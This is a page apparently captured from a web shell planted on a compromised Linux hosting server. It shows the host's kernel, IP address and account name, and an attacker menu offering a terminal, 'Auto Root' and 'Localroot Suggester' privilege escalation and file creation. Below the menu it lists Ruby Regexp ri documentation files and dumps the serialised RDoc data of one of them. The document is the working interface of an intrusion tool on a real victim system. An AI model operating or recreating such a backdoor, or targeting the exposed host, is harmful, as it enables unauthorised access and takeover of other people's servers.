Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby30 /
share /
ri /
system /
Regexp /
Delete
Unzip
Name
Size
Permission
Date
Action
%3d%3d%3d-i.ri
819
B
-rw-r--r--
2024-06-26 17:25
%3d%3d-i.ri
647
B
-rw-r--r--
2024-06-26 17:25
%3d%7e-i.ri
1.82
KB
-rw-r--r--
2024-06-26 17:25
%7e-i.ri
510
B
-rw-r--r--
2024-06-26 17:25
as_json-i.ri
374
B
-rw-r--r--
2024-06-26 17:25
casefold%3f-i.ri
536
B
-rw-r--r--
2024-06-26 17:25
cdesc-Regexp.ri
37.59
KB
-rw-r--r--
2024-06-26 17:25
compile-c.ri
284
B
-rw-r--r--
2024-06-26 17:25
encoding-i.ri
357
B
-rw-r--r--
2024-06-26 17:25
eql%3f-i.ri
733
B
-rw-r--r--
2024-06-26 17:25
escape-c.ri
703
B
-rw-r--r--
2024-06-26 17:25
fixed_encoding%3f-i.ri
1.49
KB
-rw-r--r--
2024-06-26 17:25
hash-i.ri
415
B
-rw-r--r--
2024-06-26 17:25
inspect-i.ri
591
B
-rw-r--r--
2024-06-26 17:25
json_create-c.ri
468
B
-rw-r--r--
2024-06-26 17:25
last_match-c.ri
1.34
KB
-rw-r--r--
2024-06-26 17:25
match%3f-i.ri
839
B
-rw-r--r--
2024-06-26 17:25
match-i.ri
1.24
KB
-rw-r--r--
2024-06-26 17:25
named_captures-i.ri
906
B
-rw-r--r--
2024-06-26 17:25
names-i.ri
601
B
-rw-r--r--
2024-06-26 17:25
new-c.ri
1.23
KB
-rw-r--r--
2024-06-26 17:25
options-i.ri
1.09
KB
-rw-r--r--
2024-06-26 17:25
quote-c.ri
701
B
-rw-r--r--
2024-06-26 17:25
source-i.ri
538
B
-rw-r--r--
2024-06-26 17:25
to_json-i.ri
403
B
-rw-r--r--
2024-06-26 17:25
to_s-i.ri
1.09
KB
-rw-r--r--
2024-06-26 17:25
try_convert-c.ri
798
B
-rw-r--r--
2024-06-26 17:25
union-c.ri
1.3
KB
-rw-r--r--
2024-06-26 17:25
Save
Rename
U:RDoc::AnyMethod[iI" union:ETI"Regexp::union;TT:privateo:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I";Return a Regexp object that is the union of the given ;TI"?<em>pattern</em>s, i.e., will match any of its parts. The ;TI"B<em>pattern</em>s can be Regexp objects, in which case their ;TI"Foptions will be preserved, or Strings. If no patterns are given, ;TI"Freturns <code>/(?!)/</code>. The behavior is unspecified if any ;TI"-given <em>pattern</em> contains capture.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I"5Regexp.union #=> /(?!)/ ;TI"9Regexp.union("penzance") #=> /penzance/ ;TI"8Regexp.union("a+b*c") #=> /a\+b\*c/ ;TI"@Regexp.union("skiing", "sledding") #=> /skiing|sledding/ ;TI"@Regexp.union(["skiing", "sledding"]) #=> /skiing|sledding/ ;TI"JRegexp.union(/dogs/, /cats/i) #=> /(?-mix:dogs)|(?i-mx:cats)/ ;T:@format0o; ; [I"MNote: the arguments for ::union will try to be converted into a regular ;TI"'expression literal via #to_regexp.;T: @fileI" re.c;T:0@omit_headings_from_table_of_contents_below0I"sRegexp.union(pat1, pat2, ...) -> new_regexp Regexp.union(pats_ary) -> new_regexp ;T0[ I"(*args);T@ FI"Regexp;TcRDoc::NormalClass00